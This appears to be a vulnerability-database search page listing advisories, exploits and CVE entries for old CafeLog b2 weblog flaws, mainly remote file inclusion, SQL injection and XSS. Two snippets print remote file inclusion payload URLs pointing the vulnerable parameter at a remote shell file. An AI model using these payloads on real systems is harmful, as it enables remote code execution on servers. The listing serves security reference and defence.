Lucene search
K

128 matches found

Exploit DB
Exploit DB
added 2006/12/23 12:0 a.m.25 views

b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion

b2 - 0.5 index Remote File Ýnclude +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/09/28 12:0 a.m.23 views

TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================================= TagIt! Tagboard --------------- Vulnerable: http://site/path/index.php?page=shell 0day.today 2018-03-12...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2006/04/25 12:0 a.m.12 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php?b2inc Remote File Inclusion

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues m...

0.6AI score
Exploits0
exploitpack
exploitpack
added 2006/04/25 12:0 a.m.18 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2mail.php?b2inc Remote File Inclusion

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2mail.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may all...

0.6AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/25 12:0 a.m.27 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - &#039;b2mail.php?b2inc&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/25 12:0 a.m.26 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - &#039;b2categories.php?b2inc&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/25 12:0 a.m.23 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - &#039;b2archives.php?b2inc&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...

7AI score
Exploits0
exploitpack
exploitpack
added 2006/04/25 12:0 a.m.10 views

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2archives.php?b2inc Remote File Inclusion

CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2archives.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2003/06/03 12:0 a.m.25 views

b2 cafelog: remote command execution, sql injection and another flaw.

Products: b2 cafelog 0.6.1 with ljupdate b2 cafelog 0.6.2 and prior Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details. 4. Vendor Response 1. Overview. b2 is a news/weblog tool written in php. b2 uses MySQL as backend system. 2...

0.8AI score
Exploits0
Packet Storm
Packet Storm
added 2003/05/30 12:0 a.m.57 views

b2cafelog.txt

Products: b2 cafelog 0.6.1 http://cafelog.com/ Date: 29 May 2003 Author: pokleyzz Contributors: skatscan-associates.net shaharilatscan-associates.net muniratscan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution. Description =========== b2 cafel...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2003/05/30 12:0 a.m.63 views

b2 cafelog 0.6.1 remote command execution.

Products: b2 cafelog 0.6.1 http://cafelog.com/ Date: 29 May 2003 Author: pokleyzz pokleyzzatscan-associates.net Contributors: skatscan-associates.net shaharilatscan-associates.net muniratscan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution...

1AI score
Exploits0
exploitpack
exploitpack
added 2003/05/29 12:0 a.m.13 views

Cafelog b2 0.6 - Remote File Inclusion

Cafelog b2 0.6 - Remote File Inclusion source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a...

Exploits0
Tenable Nessus
Tenable Nessus
added 2003/05/29 12:0 a.m.16 views

CafeLog B2 Multiple Script Remote File Inclusion

The remote web server is running CafeLog, a blogging application written in PHP. The 'blogger-2-b2.php' and 'gm-2-b2.php' scripts are affected by a flaw that could allow an attacker to inject code. An attacker could exploit this to execute arbitrary code on the remote host subject to the privileg...

6.3AI score
Exploits0References1
NVD
NVD
added 2003/04/22 4:0 a.m.13 views

CVE-2002-1464

Cross-site scripting XSS vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable...

6.8CVSS5.8AI score0.01507EPSS
Exploits1References4
NVD
NVD
added 2003/04/22 4:0 a.m.21 views

CVE-2002-1466

CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...

10CVSS7.5AI score0.02673EPSS
Exploits1References2
NVD
NVD
added 2003/04/22 4:0 a.m.14 views

CVE-2002-1465

SQL injection vulnerability in CafeLog b2 Weblog Tool allows remote attackers to execute arbitrary SQL code via the tablehosts variable...

7.5CVSS8.3AI score0.0138EPSS
Exploits1References4
Cvelist
Cvelist
added 2003/04/02 5:0 a.m.17 views

CVE-2002-0734

b2edit.showposts.php in B2 2.0.6pre2 and earlier does not properly load the b2config.php file in some configurations, which allows remote attackers to execute arbitrary PHP code via a URL that sets the $b2inc variable to point to a malicious program stored on a remote server...

7.4AI score0.07011EPSS
Exploits1References4
CVE
CVE
added 2003/04/02 5:0 a.m.64 views

CVE-2002-0734

B2 2.0.6pre2 and earlier are affected by CVE-2002-0734 due to a flaw in how b2edit.showposts.php loads b2config.php in certain configurations. This can allow a remote attacker to execute arbitrary PHP code by crafting a URL that sets the $b2inc variable to point to a malicious program hosted remo...

7.5CVSS7.7AI score0.07011EPSS
Exploits1References4Affected Software1
CVE
CVE
added 2003/03/18 5:0 a.m.50 views

CVE-2002-1466

The CVE-2002-1466 entry affects CafeLog b2 Weblog Tool 2.06pre4 when allow_fopen_url is enabled. The vulnerability allows remote attackers to execute arbitrary PHP code via the b2inc variable, enabling full compromise of affected installations. The root cause is the ability to reference or includ...

10CVSS7.7AI score0.02673EPSS
Exploits1References2Affected Software1
Cvelist
Cvelist
added 2003/03/18 5:0 a.m.18 views

CVE-2002-1464

Cross-site scripting XSS vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable...

5.8AI score0.01507EPSS
Exploits1References4
Rows per page
Query Builder